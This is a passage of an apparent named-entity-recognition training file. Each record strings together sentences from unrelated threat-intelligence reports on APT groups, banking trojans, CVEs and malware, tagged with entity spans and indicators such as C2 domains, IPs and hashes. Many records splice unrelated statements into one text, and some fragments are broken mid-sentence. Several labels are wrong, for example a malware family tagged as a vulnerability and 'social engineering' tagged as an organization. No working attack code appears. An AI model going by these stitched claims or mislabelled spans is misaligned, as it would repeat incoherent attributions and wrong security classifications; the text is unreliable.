[[56, 63]], "TOOL: web shell": [[64, 73], [78, 87]], "TOOL: stealer": [[103, 110]], "ORGANIZATION: Microsoft": [[123, 132]], "TOOL: Exchange": [[133, 141]]}, "info": {"id": "cyberner_stix_train_000889", "source": "cyberner_stix_train"}} {"text": "60 % of devices containing or accessing enterprise data are mobile . 
iSiGHT Partners has tracked Sandworm Team for some time - and we publicly reported on some of their activities in October 2014 , when we discovered their use of a zero-day exploit , CVE-2014-4114 . Commodity RATs also complicate efforts by security professionals to correlate a threat actor 's activity over time—attackers can hide in the sea of malicious activity that also uses Poison Ivy-based malware .", "spans": {"ORGANIZATION: iSiGHT Partners": [[69, 84]], "THREAT_ACTOR: Sandworm Team": [[97, 110]], "VULNERABILITY: zero-day exploit": [[232, 248]], "VULNERABILITY: CVE-2014-4114": [[251, 264]], "MALWARE: RATs": [[277, 281]], "MALWARE: Poison Ivy-based malware": [[449, 473]]}, "info": {"id": "cyberner_stix_train_000890", "source": "cyberner_stix_train"}} {"text": "This isn’t a bad thing as it shows a natural grouping of nodes that could be a good candidate to group to help simplify the overall graph and make analysis easier . NEODYMIUM also used the exact same CVE-2016-4117 exploit code that PROMETHIUM used , prior to public knowledge of the vulnerability 's existence .", "spans": {"MALWARE: it": [[26, 28]], "THREAT_ACTOR: NEODYMIUM": [[165, 174]], "VULNERABILITY: CVE-2016-4117": [[200, 213]], "VULNERABILITY: exploit": [[214, 221]], "THREAT_ACTOR: PROMETHIUM": [[232, 242]]}, "info": {"id": "cyberner_stix_train_000891", "source": "cyberner_stix_train"}} {"text": "The most common way to achieve this is by creating a broadcast receiver that is registered to the “ android.intent.action.BOOT_COMPLETED ” broadcast action and adding code that boots the application when the broadcast is fired . Once in possession of compromised payment card credentials , these actors use tools commonly known as card generators to generate new card numbers based on the compromised ones , creating additional opportunities for monetization . 
The June 2017 sample of Clayslide contained the same OfficeServicesStatus.vbs file found in the ISMAgent Clayslide document , but instead of having the payload embedded in the macro as segregated base64 strings that would be concatenated , this variant obtained its payload from multiple cells within the \" Incompatible \" worksheet .", "spans": {"TOOL: card credentials": [[271, 287]], "THREAT_ACTOR: actors": [[296, 302]], "MALWARE: Clayslide": [[485, 494]], "FILEPATH: OfficeServicesStatus.vbs file": [[514, 543]], "MALWARE: ISMAgent Clayslide document": [[557, 584]]}, "info": {"id": "cyberner_stix_train_000892", "source": "cyberner_stix_train"}} {"text": "] com/aa hxxp : //nttdocomo-qar [ . Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin . This report is being released to help researchers and security practitioners combat this campaign as new samples are being discovered in the wild daily . They choses the appropriate DLL by passing a flag in the first Argument .", "spans": {"ORGANIZATION: FireEye": [[79, 86]], "THREAT_ACTOR: group": [[116, 121]]}, "info": {"id": "cyberner_stix_train_000893", "source": "cyberner_stix_train"}} {"text": "Distribution of victims . This , in turn , would provide access to a larger amount of intellectual property and sensitive data . OceanLotus : plan.evillese.com:8531 11b4 . Seven of the vulnerabilities included in today ’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10 .", "spans": {"THREAT_ACTOR: OceanLotus": [[129, 139]], "DOMAIN: plan.evillese.com:8531": [[142, 164]]}, "info": {"id": "cyberner_stix_train_000894", "source": "cyberner_stix_train"}} {"text": "All communication with the C2 is done over HTTP . In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes . 
In this campaign , the Group123 used a classical HWP document in order to download and execute a previously unknown malware : NavRAT .", "spans": {"TOOL: More_eggs": [[69, 78]], "THREAT_ACTOR: ITG08": [[89, 94]], "TOOL: Mimikatz": [[166, 174]], "THREAT_ACTOR: Group123": [[235, 243]], "MALWARE: HWP document": [[261, 273]], "MALWARE: NavRAT": [[338, 344]]}, "info": {"id": "cyberner_stix_train_000895", "source": "cyberner_stix_train"}} {"text": "The malware mainly targets banking and financial applications , but also looks for popular shopping apps such as eBay or Amazon . Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly . The links between CopyPaste and FIN7 are still very weak . As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": {"ORGANIZATION: eBay": [[113, 117]], "ORGANIZATION: Amazon": [[121, 127]], "ORGANIZATION: Symantec": [[130, 138]], "THREAT_ACTOR: CopyPaste": [[272, 281]], "THREAT_ACTOR: FIN7": [[286, 290]], "MALWARE: SocGholish": [[346, 356]], "TOOL: Cobalt Strike": [[504, 517]], "TOOL: Mimikatz": [[521, 529]]}, "info": {"id": "cyberner_stix_train_000896", "source": "cyberner_stix_train"}} {"text": "To be distributed outside the app store , an IPA package must contain a mobile provisioning profile with an enterprise ’ s certificate . The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . 
Given the use of lure documents designed with social engineering in mind , it is likely that MuddyWater use phishing or spam to target users who are unaware of these documents ' malicious nature .", "spans": {"VULNERABILITY: EternalBlue exploit": [[141, 160]], "TOOL: Petya": [[274, 279]], "TOOL: NotPetya": [[282, 290]], "ORGANIZATION: social engineering": [[352, 370]], "THREAT_ACTOR: MuddyWater": [[399, 409]]}, "info": {"id": "cyberner_stix_train_000897", "source": "cyberner_stix_train"}} {"text": "At some point in his Google Play “ career ” , he apparently decided to increase his ad revenue by implementing adware functionality in his apps ’ code . One of them – ipv4.dll – has been placed by the APT with what is , in fact , a downloader for other malicious components . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) .", "spans": {"SYSTEM: Google Play": [[21, 32]], "MALWARE: ipv4.dll": [[167, 175]], "TOOL: downloader": [[232, 242]], "FILEPATH: 32-bit Windows executable file": [[321, 351]], "MALWARE: Remote Access Trojan": [[370, 390]], "MALWARE: RAT": [[393, 396]]}, "info": {"id": "cyberner_stix_train_000899", "source": "cyberner_stix_train"}} {"text": "Two details about MiniDuke components are worth noting .", "spans": {"MALWARE: MiniDuke": [[18, 26]]}, "info": {"id": "cyberner_stix_train_000900", "source": "cyberner_stix_train"}} {"text": "In the latest version , a layer of obfuscation was added , perhaps taking the malware one step closer to being fully operational . Japan is no stranger to banking malware . 
Characterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East ( including targets inside Iran itself ) , as well as across Europe and in the United States .", "spans": {"MALWARE: banking": [[155, 162]], "MALWARE: malware": [[163, 170]], "MALWARE: unsophisticated technical merit": [[201, 232]]}, "info": {"id": "cyberner_stix_train_000901", "source": "cyberner_stix_train"}} {"text": "Then , using POST requests to the relative address report.php , it sends data about the device ( IMEI , phone number , country , mobile operator , phone model , availability of root rights , OS version ) , list of contacts , list of installed apps , incoming SMS , and other information . FireEye iSIGHT Intelligence has been tracking a pair of cybercriminals that we refer to as the Vendetta Brothers . Another difference is the directory where the files are dropped , it's no longer C:\\Windows but rather the local setting of the current user (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe) .", "spans": {"ORGANIZATION: FireEye iSIGHT": [[289, 303]], "THREAT_ACTOR: Vendetta Brothers": [[384, 401]], "FILEPATH: C:\\Windows": [[485, 495]], "FILEPATH: (%USERPROFILE%\\Local Settings\\winnit\\winnit.exe)": [[545, 593]]}, "info": {"id": "cyberner_stix_train_000902", "source": "cyberner_stix_train"}} {"text": "It is a very unusual way to get Device Administrator rights . PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage . As we stated in there port , our position was that “ The Chinese government may authorize this activity , but there ’s no way to determine the extent of its involvement. ” Now , three years later , we have the evidence required to change our assessment . 
• Based on the analysis , it appears that the MiniDuke - s creators provide a dynamic backup system that also can fly under the radar – if Twitter isn - t working or the accounts are down , the malware can use Google Search to find the encrypted strings to the next C2 .", "spans": {"THREAT_ACTOR: MiniDuke - s creators": [[625, 646]], "ORGANIZATION: Twitter": [[718, 725]], "MALWARE: malware": [[773, 780]], "ORGANIZATION: Google": [[789, 795]]}, "info": {"id": "cyberner_stix_train_000903", "source": "cyberner_stix_train"}} {"text": "Some actions include ( with rough translations ) : The command-and-control server The command-and-control server is located at IP 64.78.161.133 . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . BlackOasis in recent months sent a wave of phishing emails .", "spans": {"THREAT_ACTOR: Tropic Trooper": [[146, 160]], "VULNERABILITY: CVE-2012-0158": [[186, 199]], "THREAT_ACTOR: BlackOasis": [[230, 240]], "TOOL: emails": [[282, 288]]}, "info": {"id": "cyberner_stix_train_000904", "source": "cyberner_stix_train"}} {"text": "The following is a screenshot from IDA with comments showing the strings and JNI functions . Our direct observation of in-the-wild spearphishing attacks staged by the Bahamut group have been solely attempts to deceive targets into providing account passwords through impersonation of notices from platform providers . FileMG File Manager . winvnc Remote Desktop . rPortMap Port Forwarding . capsrv Video Device Spying . zxplug Add and load a ZxShell custom plugin . 
Wall to Wall reached out in July 2022 about collaborating with Bullock after KrebsOnSecurity published A Retrospective on the 2015 Ashley Madison Breach .", "spans": {"ORGANIZATION: platform providers": [[297, 315]], "MALWARE: ZxShell": [[442, 449]], "ORGANIZATION: Wall to Wall": [[466, 478]], "ORGANIZATION: Bullock": [[529, 536]], "ORGANIZATION: KrebsOnSecurity": [[543, 558]]}, "info": {"id": "cyberner_stix_train_000905", "source": "cyberner_stix_train"}} {"text": "If the device is located outside Russia or is an emulator , the application displays a stub page : In this case , the Trojan ’ s logs contain records in Russian with grammatical errors and spelling mistakes : If the check is successful , Rotexy registers with GCM and launches SuperService which tracks if the Trojan has device administrator privileges . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files . Microsoft addressed the SMBv1 vulnerabilities in March 2017 with Security Bulletin MS17-010 .", "spans": {"MALWARE: Rotexy": [[238, 244]], "SYSTEM: GCM": [[260, 263]], "TOOL: PIVY": [[425, 429]], "MALWARE: malicious files": [[653, 668]], "ORGANIZATION: Microsoft": [[671, 680]], "TOOL: SMBv1": [[695, 700]], "VULNERABILITY: vulnerabilities": [[701, 716]]}, "info": {"id": "cyberner_stix_train_000906", "source": "cyberner_stix_train"}} {"text": "] com Counter Measures Use an up to date anti-malware software that is capable of identifying this threat . To enable connections to the infected computer using the Remote Desktop Protocol ( RDP ) , Carbanak sets Termservice service execution mode to Auto . 
Additionally , the group compromised organizations in Europe and North America that have ties to the Middle East .", "spans": {"TOOL: Remote Desktop Protocol": [[165, 188]], "TOOL: RDP": [[191, 194]], "VULNERABILITY: Carbanak": [[199, 207]]}, "info": {"id": "cyberner_stix_train_000907", "source": "cyberner_stix_train"}} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year .", "spans": {"VULNERABILITY: Carbanak": [[0, 8]], "TOOL: Carberp": [[176, 183]], "THREAT_ACTOR: ‘Operation Sheep’": [[193, 210]], "VULNERABILITY: exploit": [[297, 304]], "VULNERABILITY: Man-in-the-Disk": [[309, 324]]}, "info": {"id": "cyberner_stix_train_000908", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed the threat actors employing legitimate Kaspersky antivirus variants in analyzed samples .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "ORGANIZATION: Kaspersky": [[69, 78]]}, "info": {"id": "cyberner_stix_train_000909", "source": "cyberner_stix_train"}} {"text": "F-Secure ’s whitepaper on CosmicDuke includes a timeline of the loader ’s usage , based on compilation timestamps .", "spans": {"ORGANIZATION: F-Secure": [[0, 8]], "MALWARE: CosmicDuke": [[26, 36]]}, "info": {"id": "cyberner_stix_train_000910", "source": "cyberner_stix_train"}} {"text": "This group famously also reached out to WikiLeaks ( referred to as \" Organization 1 \" in the indictment ) to amplify their information operation , and they promoted the leaks to journalists through GRU -controlled email and social media accounts .", "spans": {"TOOL: WikiLeaks": [[40, 49]], "ORGANIZATION: GRU": [[198, 201]], "TOOL: email": [[214, 219]]}, "info": {"id": 
"cyberner_stix_train_000911", "source": "cyberner_stix_train"}} {"text": "Perhaps more information on XLoader will be known in the future . We assess that APT28 is most likely sponsored by the Russian government . Once written, the send operations . As confirmed by our own research data , CISA also found LockBit took the top spot as the biggest global ransomware threat in 2022 .", "spans": {"MALWARE: XLoader": [[28, 35]], "THREAT_ACTOR: APT28": [[81, 86]], "ORGANIZATION: CISA": [[216, 220]], "THREAT_ACTOR: LockBit": [[232, 239]]}, "info": {"id": "cyberner_stix_train_000912", "source": "cyberner_stix_train"}} {"text": "In order to track who opened the phishing emails , viewed the links , and downloaded the attachments in real-time , APT32 used cloud-based email analytics software designed for sales organizations . The attackers sent multiple emails containing macro-enabled XLS files to employees working in the banking sector in the Middle East .", "spans": {"THREAT_ACTOR: APT32": [[116, 121]], "ORGANIZATION: sales organizations": [[177, 196]], "THREAT_ACTOR: attackers": [[203, 212]], "TOOL: emails": [[227, 233]], "FILEPATH: XLS files": [[259, 268]], "ORGANIZATION: employees working in the banking sector": [[272, 311]]}, "info": {"id": "cyberner_stix_train_000913", "source": "cyberner_stix_train"}} {"text": "The DNC announced it had suffered a network compromise and that a subsequent investigation found evidence of two breaches , attributed to APT28 and APT29 .", "spans": {"ORGANIZATION: DNC": [[4, 7]], "THREAT_ACTOR: APT28": [[138, 143]], "THREAT_ACTOR: APT29": [[148, 153]]}, "info": {"id": "cyberner_stix_train_000914", "source": "cyberner_stix_train"}} {"text": "CTU researchers have observed BRONZE PRESIDENT targeting multiple NGOs .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: BRONZE PRESIDENT": [[30, 46]], "ORGANIZATION: NGOs": [[66, 70]]}, "info": {"id": "cyberner_stix_train_000915", "source": "cyberner_stix_train"}} {"text": "Indicators of 
Compromise SHA256 Package App label 332e68d865009d627343b89a5744843e3fde4ae870193f36b82980363439a425 ufD.wykyx.vlhvh SEX kr porn 403401aa71df1830d294b78de0e5e867ee3738568369c48ffafe1b15f3145588 ufD.wyjyx.vahvh 佐川急便 466dafa82a4460dcad722d2ad9b8ca332e9a896fc59f06e16ebe981ad3838a6b Some of APT28 's more commonly used tools are the SOURFACE downloader , its second stage backdoor EVILTOSS , and a modular family of implants that we call CHOPSTICK . If the send function is being invoked in ping mode, the process described above is followed; however, instead of manually building and transmitting the DNS query, the [System.Net.Dns]::GetHostAddresses method is . In the months leading up to and after Russia ’s illegal further invasion began , Ukraine experienced a series of disruptive cyber operations , including website defacements , distributed denial - of - service ( DDoS ) attacks , and cyber attacks to delete data from computers belonging to government and private entities – all part of the Russian playbook .", "spans": {"THREAT_ACTOR: APT28": [[302, 307]], "TOOL: SOURFACE downloader": [[344, 363]], "TOOL: EVILTOSS": [[392, 400]], "TOOL: modular family of implants": [[409, 435]], "TOOL: CHOPSTICK": [[449, 458]], "ORGANIZATION: Ukraine": [[756, 763]], "THREAT_ACTOR: series of disruptive cyber operations": [[778, 815]]}, "info": {"id": "cyberner_stix_train_000916", "source": "cyberner_stix_train"}} {"text": "'' The application uses the label \" Installer '' and its name is \" android.app.Application . The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit . 
In 2017 , APT37 targeted a company in Middle East that entered into a joint venture with the North Korean government to provide telecommunications service to the country .", "spans": {"THREAT_ACTOR: actor": [[97, 102]], "VULNERABILITY: CVE-2018–8440": [[123, 136]], "VULNERABILITY: vulnerability": [[165, 178]], "VULNERABILITY: proof-of-concept": [[301, 317]], "VULNERABILITY: exploit": [[318, 325]], "THREAT_ACTOR: APT37": [[338, 343]], "ORGANIZATION: telecommunications service": [[456, 482]]}, "info": {"id": "cyberner_stix_train_000917", "source": "cyberner_stix_train"}} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . Turla is a notorious group that has been targeting government officials .", "spans": {"MALWARE: slides": [[33, 39]], "VULNERABILITY: CVE-2017-8759": [[64, 77]], "TOOL: Microsoft .NET framework": [[121, 145]], "THREAT_ACTOR: Turla": [[148, 153]], "ORGANIZATION: government officials": [[199, 219]]}, "info": {"id": "cyberner_stix_train_000918", "source": "cyberner_stix_train"}} {"text": "Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords . Based on analysis of the group 's SWCs , TG-3390 operations likely affect organizations in other countries and verticals .", "spans": {"MALWARE: SWCs": [[182, 186]], "THREAT_ACTOR: TG-3390": [[189, 196]]}, "info": {"id": "cyberner_stix_train_000919", "source": "cyberner_stix_train"}} {"text": "The iOS apps leverage the same C2 infrastructure as the Android version and use similar communications protocols . While this particular actor effectively used their almost worn out CVE-2012-0158 exploits in the past , Spring Dragon employs more involved and creative intrusive activity as well . 
Between February and March 2019 , probable MuddyWater-associated samples indicated that BlackWater established persistence on the compromised host , at used PowerShell commands to enumerate the victim 's machine and contained the IP address of the actor 's command and control ( C2 ) .", "spans": {"SYSTEM: iOS": [[4, 7]], "SYSTEM: Android": [[56, 63]], "THREAT_ACTOR: actor": [[137, 142], [545, 550]], "VULNERABILITY: CVE-2012-0158": [[182, 195]], "THREAT_ACTOR: Spring Dragon": [[219, 232]], "MALWARE: MuddyWater-associated samples": [[340, 369]], "MALWARE: PowerShell commands": [[454, 473]], "TOOL: C2": [[576, 578]]}, "info": {"id": "cyberner_stix_train_000920", "source": "cyberner_stix_train"}} {"text": "TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication . Conversely , LokiBot and Agent Tesla are new malware tools .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "ORGANIZATION: CTU": [[56, 59]], "VULNERABILITY: zero-day exploits": [[114, 131]], "MALWARE: LokiBot": [[170, 177]], "MALWARE: Agent Tesla": [[182, 193]]}, "info": {"id": "cyberner_stix_train_000921", "source": "cyberner_stix_train"}} {"text": "Better not to take any chances at all , no matter which version of the OS you use . this RTF exploits again the CVE-2017_1882 on eqnedt32.exe . 
The vulnerability was patched by Microsoft on Nov 14 , 2017 .", "spans": {"MALWARE: RTF": [[89, 92]], "VULNERABILITY: CVE-2017_1882": [[112, 125]], "MALWARE: eqnedt32.exe": [[129, 141]], "ORGANIZATION: Microsoft": [[177, 186]]}, "info": {"id": "cyberner_stix_train_000922", "source": "cyberner_stix_train"}} {"text": "de.dkb.portalapp pl.pkobp.ipkobiznes pl.com.suntech.mobileconnect eu.eleader.mobilebanking.pekao.firm pl.mbank pl.upaid.nfcwallet.mbank eu.eleader.mobilebanking.bre pl.asseco.mpromak.android.app.bre pl.asseco.mpromak.android.app.bre.hd pl.mbank.mnews eu.eleader.mobilebanking.raiffeisen pl.raiffeisen.nfc hr.asseco.android.jimba.rmb PROMETHIUM is an activity group that has been active as early as 2012 . In the recent months , Ukrainian CERT ( CERT-UA ) reported an intensification of Gamaredon B-ACT S-APT Cyberattacks against military targets . The Aclip backdoor uses the Slack API to send system data , files , and screenshots to the C2 while receiving PowerShell commands at the same time .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[333, 343]], "THREAT_ACTOR: activity group": [[350, 364]], "ORGANIZATION: Ukrainian CERT": [[428, 442]], "ORGANIZATION: CERT-UA": [[445, 452]], "MALWARE: Aclip backdoor": [[551, 565]], "TOOL: Slack API": [[575, 584]]}, "info": {"id": "cyberner_stix_train_000923", "source": "cyberner_stix_train"}} {"text": "Shamoon2 : 5.254.100.200 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "IP_ADDRESS: 5.254.100.200": [[11, 24]]}, "info": {"id": "cyberner_stix_train_000924", "source": "cyberner_stix_train"}} {"text": "One of the reasons Winexe is preferred over PSExec , is that it provides a Linux client , while PSExec doesn’t .", "spans": {"TOOL: Winexe": [[19, 25]], "TOOL: PSExec": [[44, 50], [96, 102]], "SYSTEM: Linux": [[75, 80]]}, "info": {"id": "cyberner_stix_train_000925", "source": "cyberner_stix_train"}} {"text": "Based on the Tafacalou infection logs , we observed that most of the victims are in the following countries : Syria , Iran 
, Malaysia , USA , China , Turkey , Netherlands , Germany , Great Britain , Russia , Sweden , Austria , Algeria , Israel , Iraq , Morocco , New Zealand , Ukraine . Since 2013 Carbanak has successfully gained access to networks of more than 50 banks and 5 payment systems .", "spans": {"TOOL: Tafacalou": [[13, 22]], "MALWARE: Carbanak": [[298, 306]], "ORGANIZATION: banks": [[366, 371]], "ORGANIZATION: payment systems": [[378, 393]]}, "info": {"id": "cyberner_stix_train_000926", "source": "cyberner_stix_train"}} {"text": ", a reference to Hamas military leader Mazen Fuqaha who was assassinated on March 24 , 2017 .", "spans": {"ORGANIZATION: Hamas": [[17, 22]]}, "info": {"id": "cyberner_stix_train_000927", "source": "cyberner_stix_train"}} {"text": "Such notifications would be received by the MiHome app or any other , such as HenBox , so long as they register their intent to do so . Public reports of supply chain compromises linked to APT41 date back to at least 2014 , and technical evidence associated with these incidents was used to determine a relationship , if any , with APT41 . APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"SYSTEM: MiHome": [[44, 50]], "MALWARE: HenBox": [[78, 84]], "THREAT_ACTOR: APT41": [[189, 194], [332, 337]], "THREAT_ACTOR: APT28": [[340, 345]], "TOOL: Flash": [[389, 394]], "VULNERABILITY: exploits": [[395, 403]], "MALWARE: Carberp": [[421, 428]], "MALWARE: JHUHUGIT downloaders": [[435, 455]]}, "info": {"id": "cyberner_stix_train_000928", "source": "cyberner_stix_train"}} {"text": "USPS is the most well-known branch of the US government and provides a publicly funded postal service . Recorded Future’s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . 
Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware .", "spans": {"ORGANIZATION: USPS": [[0, 4]], "ORGANIZATION: Recorded Future’s": [[104, 121]], "THREAT_ACTOR: Insikt": [[122, 128]], "THREAT_ACTOR: Group": [[129, 134]], "THREAT_ACTOR: APT33": [[155, 160]], "ORGANIZATION: Kaspersky Lab": [[320, 333]], "ORGANIZATION: financial institutions": [[370, 392]], "MALWARE: GCMAN": [[431, 436]], "MALWARE: malware": [[437, 444]]}, "info": {"id": "cyberner_stix_train_000929", "source": "cyberner_stix_train"}} {"text": "Allows an application to read SMS messages . These redactions include ten of thousands of CIA targets and attack machines throughout Latin America , Europe and the United States . The group is believed to be Vietnam based .", "spans": {"THREAT_ACTOR: CIA": [[90, 93]]}, "info": {"id": "cyberner_stix_train_000930", "source": "cyberner_stix_train"}} {"text": "Tactical threat intelligence is based on incident response investigations and research , and is mapped to the kill chain .", "spans": {}, "info": {"id": "cyberner_stix_train_000931", "source": "cyberner_stix_train"}} {"text": "This blog post describes another attack campaign where attackers used the Uri terror attack and Kashmir protest themed spear phishing email to target officials in the Indian Embassies and Indian Ministry of External Affairs ( MEA ) .", "spans": {"TOOL: email": [[134, 139]], "ORGANIZATION: Indian Embassies": [[167, 183]], "ORGANIZATION: Indian Ministry of External Affairs": [[188, 223]], "ORGANIZATION: MEA": [[226, 229]]}, "info": {"id": "cyberner_stix_train_000932", "source": "cyberner_stix_train"}} {"text": "The malware ’ s creators had used obfuscation to upload the new piece of malware to Google Play . Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
During our analysis of victim networks , we were able to observe APT10 once again initiate a retooling cycle in late 2016 .", "spans": {"SYSTEM: Google Play": [[84, 95]], "THREAT_ACTOR: Patchwork": [[108, 117]], "MALWARE: MS PowerPoint document": [[126, 148]], "VULNERABILITY: CVE-2014-6352": [[174, 187]], "THREAT_ACTOR: APT10": [[255, 260]]}, "info": {"id": "cyberner_stix_train_000933", "source": "cyberner_stix_train"}} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . The threat actors use a commercial installation tool called Smart Installer Maker to encapsulate and execute a self-extracting RAR archive and in some cases a decoy slideshow or Flash installation application .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]], "MALWARE: Smart Installer Maker": [[131, 152]], "MALWARE: self-extracting RAR": [[182, 201]], "MALWARE: decoy slideshow": [[230, 245]], "MALWARE: Flash installation application": [[249, 279]]}, "info": {"id": "cyberner_stix_train_000934", "source": "cyberner_stix_train"}} {"text": "Sample 1 may use AES-encrypted strings with reflection , while Sample 2 ( submitted on the same day ) will use the same code but with plaintext strings . Blackgear has been targeting various industries since its emergence a decade ago . The new xor encoding byte is 0x5B . As well as SysUpdate , the attackers used a number of legitimate or publicly available tools to map the network and dump credentials .", "spans": {"ORGANIZATION: AES-encrypted": [[17, 30]], "MALWARE: SysUpdate": [[284, 293]], "THREAT_ACTOR: attackers": [[300, 309]], "TOOL: legitimate or publicly available tools": [[327, 365]]}, "info": {"id": "cyberner_stix_train_000935", "source": "cyberner_stix_train"}} {"text": "The collection of basic device information . APT33 sent spear phishing emails to employees whose jobs related to the aviation industry . The developers used GCC compiler on Windows in the MinGW . 
Commercial spyware can be seen as having legitimate reasons to exist , especially in instances of crime and terrorism ( as long as it is highly regulated ) .", "spans": {"THREAT_ACTOR: APT33": [[45, 50]], "ORGANIZATION: employees": [[81, 90]], "ORGANIZATION: aviation industry": [[117, 134]], "TOOL: GCC": [[157, 160]], "SYSTEM: Windows": [[173, 180]], "TOOL: MinGW": [[188, 193]], "TOOL: Commercial spyware": [[196, 214]]}, "info": {"id": "cyberner_stix_train_000936", "source": "cyberner_stix_train"}} {"text": "They are both targeting businesses using accounting software , are fingerprinting systems of interest similarly , are looking for smart card readers , and finally , they deploy an array of malicious tools to spy on their victims . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": {"ORGANIZATION: businesses": [[24, 34]], "ORGANIZATION: specific individuals": [[356, 376]]}, "info": {"id": "cyberner_stix_train_000937", "source": "cyberner_stix_train"}} {"text": "July 14 A new zero-day vulnerability ( CVE-2015-2425 ) was found in Internet Explorer . The vulnerability was used to retrieve and execute Cobalt Strike from a remote server they controlled . However , DarkRace is a new ransomware group first discovered by researcher S!Ri .", "spans": {"VULNERABILITY: zero-day vulnerability": [[14, 36]], "VULNERABILITY: CVE-2015-2425": [[39, 52]], "SYSTEM: Internet Explorer": [[68, 85]], "TOOL: Cobalt Strike": [[139, 152]], "THREAT_ACTOR: DarkRace": [[202, 210]], "ORGANIZATION: S!Ri": [[268, 272]]}, "info": {"id": "cyberner_stix_train_000938", "source": "cyberner_stix_train"}} {"text": "Table 4 HenBox variant 's Intents and Receivers Most of the intents registered in the AndroidManifest.xml file , or loaded during run-time , are commonly found in malicious Android apps . 
APT41 is well-known for leveraging compromised digital certificates from video game studios to sign malware . Previous work published by security vendor FireEye in October 2014 suggests the group might be of Russian origin .", "spans": {"MALWARE: HenBox": [[8, 14]], "SYSTEM: Android": [[173, 180]], "THREAT_ACTOR: APT41": [[188, 193]], "ORGANIZATION: FireEye": [[341, 348]]}, "info": {"id": "cyberner_stix_train_000939", "source": "cyberner_stix_train"}} {"text": "Letting an attacker get access to this kind of data can have severe consequences . The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . Attackers can point and click their ACT through a compromised network and exfiltrate data .", "spans": {"VULNERABILITY: CVE-2012-0158": [[106, 119]], "THREAT_ACTOR: Attackers": [[185, 194]]}, "info": {"id": "cyberner_stix_train_000940", "source": "cyberner_stix_train"}} {"text": "” some_encrypted_data ” } .", "spans": {}, "info": {"id": "cyberner_stix_train_000941", "source": "cyberner_stix_train"}} {"text": "This supports our analysis that the overarching theme in the Dukes ’ targeting is the collection of intelligence to support diplomatic efforts .", "spans": {"THREAT_ACTOR: Dukes": [[61, 66]]}, "info": {"id": "cyberner_stix_train_000942", "source": "cyberner_stix_train"}} {"text": "] net page for DroidVPN remained identical when serving either HenBox or DroidVPN apps , just that the legitimate APK file had been replaced with HenBox for an unknown period of time . Raiu and his team have followed the digital tracks left behind by some of the Winnti hackers . 
Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc .", "spans": {"MALWARE: HenBox": [[63, 69]], "ORGANIZATION: Raiu": [[185, 189]], "THREAT_ACTOR: Winnti": [[263, 269]], "THREAT_ACTOR: Numbered Panda": [[280, 294]], "THREAT_ACTOR: DYNCALC": [[381, 388]], "THREAT_ACTOR: IXESHE": [[391, 397]], "THREAT_ACTOR: JOY RAT": [[400, 407]], "THREAT_ACTOR: APT-12": [[410, 416]]}, "info": {"id": "cyberner_stix_train_000943", "source": "cyberner_stix_train"}} {"text": "C:\\Users\\user\\runawy.exe .", "spans": {"FILEPATH: C:\\Users\\user\\runawy.exe": [[0, 24]]}, "info": {"id": "cyberner_stix_train_000944", "source": "cyberner_stix_train"}} {"text": "We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents .", "spans": {"MALWARE: them": [[22, 26]], "TOOL: emails": [[214, 220]], "MALWARE: RTLO technique": [[270, 284]], "FILEPATH: decoy documents": [[304, 319]]}, "info": {"id": "cyberner_stix_train_000946", "source": "cyberner_stix_train"}} {"text": "First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan . Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 .", "spans": {"MALWARE: Bugat": [[63, 68]], 